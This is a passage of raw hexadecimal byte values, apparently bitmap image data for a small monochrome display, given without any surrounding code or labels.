0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,
0X00,0X01,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X3F,0XFF,0XF8,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,
0X3F,0XFF,0XFF,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,0XFF,0XFF,0XF8,0X01,0XFF,0XFF,0XF8,0X00,0X0F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,
0X00,0X01,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X1F,0XFF,0XF8,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X08,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,
0X7F,0XFF,0XFF,0X80,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X3F,0XFF,0XFF,0XF8,0X03,0XFF,0XFF,0XFC,0X00,0X0F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,
0X00,0X01,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X1F,0XFF,0XF8,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X38,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,
0XFF,0XFF,0XFF,0X80,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFC,0X07,0XFF,0XFF,0XFC,0X00,0X07,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,
0X00,0X00,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X1F,0XFF,0XF0,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,
0XFF,0XFF,0XFF,0XC0,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X1F,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFE,0X00,0X07,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,
0X00,0X00,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X1F,0XFF,0XF0,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X03,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XC0,0X01,
0XFF,0XFF,0XFF,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X1F,0XFF,0XFF,0XFF,0X1F,0XFF,0XFF,0XFE,0X00,0X07,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,
0X00,0X00,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X0F,0XFF,0XF0,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X07,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XC0,0X01,
0XFF,0XFF,0XFF,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X1F,0XFF,0XFF,0XFF,0X3F,0XFF,0XFF,0XFF,0X00,0X07,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,
0X00,0X00,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X0F,0XFF,0XE0,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X1F,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XC0,0X03,
0XFF,0XFF,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,
0X00,0X00,0X7F,0XFF,0XFF,0XFC,0X00,0X00,0X0F,0XFF,0XE0,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X7F,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,
0X00,0X00,0X7F,0XFF,0XFF,0XFC,0X00,0X00,0X07,0XFF,0XE0,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X01,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X80,0X07,
0XFF,0XFF,0XFF,0XF8,0X00,0X7F,0XFF,0XFF,0XFF,0XFC,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,
0X00,0X00,0X7F,0XFF,0XFF,0XFC,0X00,0X00,0X07,0XFF,0XE0,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X80,0X07,
0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,
0X00,0X00,0X3F,0XFF,0XFF,0XFC,0X00,0X00,0X07,0XFF,0XC0,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X1F,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X00,0X07,
0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X40,0X00,0X3F,0XFF,0XFF,0XFC,0X00,0X00,0X07,0XFF,0XC0,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X7F,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X00,0X0F,
0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X40,0X00,0X3F,0XFF,0XFF,0XFC,0X00,0X00,0X03,0XFF,0XC0,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X00,0X0F,
0XFF,0XFF,0XFF,0XE0,0X00,0X3F,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X40,0X00,0X1F,0XFF,0XFF,0XFC,0X00,0X00,0X03,0XFF,0X80,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X00,0X0F,
0XFF,0XFF,0XFF,0XC0,0X00,0X1F,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,
0XE0,0X00,0X1F,0XFF,0XFF,0XFC,0X00,0X00,0X03,0XFF,0X80,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,
0XFF,0XFF,0XFF,0X80,0X00,0X1F,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,
0XE0,0X00,0X1F,0XFF,0XFF,0XFC,0X00,0X20,0X01,0XFF,0X80,0X08,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,
0XFF,0XFF,0XFE,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,
0XE0,0X00,0X1F,0XFF,0XFF,0XFC,0X00,0X20,0X01,0XFF,0X00,0X08,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,
0XFF,0XFF,0XFC,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,
0XE0,0X00,0X0F,0XFF,0XFF,0XFC,0X00,0X20,0X01,0XFF,0X00,0X08,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,
0XFF,0XFF,0XF8,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X07,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X01,
0XF0,0X00,0X0F,0XFF,0XFF,0XFC,0X00,0X30,0X01,0XFF,0X00,0X08,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,
0XFF,0XFF,0XE0,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X07,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X01,
0XF0,0X00,0X0F,0XFF,0XFF,0XFC,0X00,0X30,0X00,0XFF,0X00,0X18,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,
0XFF,0XFF,0XC0,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X07,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X01,
0XF0,0X00,0X07,0XFF,0XFF,0XFC,0X00,0X30,0X00,0XFE,0X00,0X18,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFF,0XFF,0X80,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X07,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X03,
0XF0,0X00,0X07,0XFF,0XFF,0XFC,0X00,0X30,0X00,0XFE,0X00,0X18,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFF,0XFE,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XC0,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X03,
0XF8,0X00,0X07,0XFF,0XFF,0XFC,0X00,0X38,0X00,0X7E,0X00,0X38,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFF,0XFC,0X00,0X01,0X00,0X0F,0XFF,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X03,
0XF8,0X00,0X07,0XFF,0XFF,0XFC,0X00,0X38,0X00,0X7C,0X00,0X38,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFF,0XF0,0X00,0X07,0X00,0X0F,0XFF,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFC,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X03,
0XF8,0X00,0X03,0XFF,0XFF,0XF8,0X00,0X38,0X00,0X7C,0X00,0X38,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFF,0XE0,0X00,0X0F,0X00,0X0F,0XFF,0XFF,0XFF,0XF0,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X1F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X07,
0XFC,0X00,0X03,0XFF,0XFF,0XF8,0X00,0X38,0X00,0X7C,0X00,0X78,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFF,0XC0,0X00,0X1F,0X00,0X0F,0XFF,0XFF,0XFF,0XFC,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X1F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X07,
0XFC,0X00,0X03,0XFF,0XFF,0XF8,0X00,0X3C,0X00,0X3C,0X00,0X78,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFF,0X00,0X00,0X7F,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X07,
0XFC,0X00,0X01,0XFF,0XFF,0XF8,0X00,0X3C,0X00,0X38,0X00,0X78,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFE,0X00,0X00,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X3F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,
0XFC,0X00,0X01,0XFF,0XFF,0XF8,0X00,0X3C,0X00,0X38,0X00,0XF8,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFC,0X00,0X01,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X7F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,
0XFE,0X00,0X01,0XFF,0XFF,0XF8,0X00,0X3E,0X00,0X38,0X00,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XF0,0X00,0X07,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,
0XFE,0X00,0X00,0XFF,0XFF,0XF8,0X00,0X3E,0X00,0X38,0X00,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XE0,0X00,0X0F,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X0F,
0XFE,0X00,0X00,0XFF,0XFF,0XF8,0X00,0X3E,0X00,0X10,0X01,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XC0,0X00,0X1F,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X01,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X1F,
0XFE,0X00,0X00,0XFF,0XFF,0XF8,0X00,0X3E,0X00,0X10,0X01,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0X00,0X00,0X7F,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X03,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X1F,
0XFF,0X00,0X00,0XFF,0XFF,0XF8,0X00,0X3F,0X00,0X10,0X01,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3E,
0X00,0X00,0XFF,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X03,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X1F,
0XFF,0X00,0X00,0X7F,0XFF,0XF8,0X00,0X3F,0X00,0X10,0X03,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3C,
0X00,0X01,0XFF,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,
0XFF,0X00,0X00,0X7F,0XFF,0XF8,0X00,0X3F,0X00,0X00,0X03,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X30,
0X00,0X07,0XFF,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X0F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,
0XFF,0X80,0X00,0X7F,0XFF,0XF8,0X00,0X3F,0X00,0X00,0X03,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X20,
0X00,0X0F,0XFF,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,
0XFF,0X80,0X00,0X3F,0XFF,0XF8,0X00,0X3F,0X80,0X00,0X03,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X00,
0X00,0X1F,0XFF,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X3F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X3F,
0XFF,0X80,0X00,0X3F,0XFF,0XF8,0X00,0X3F,0X80,0X00,0X07,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X00,
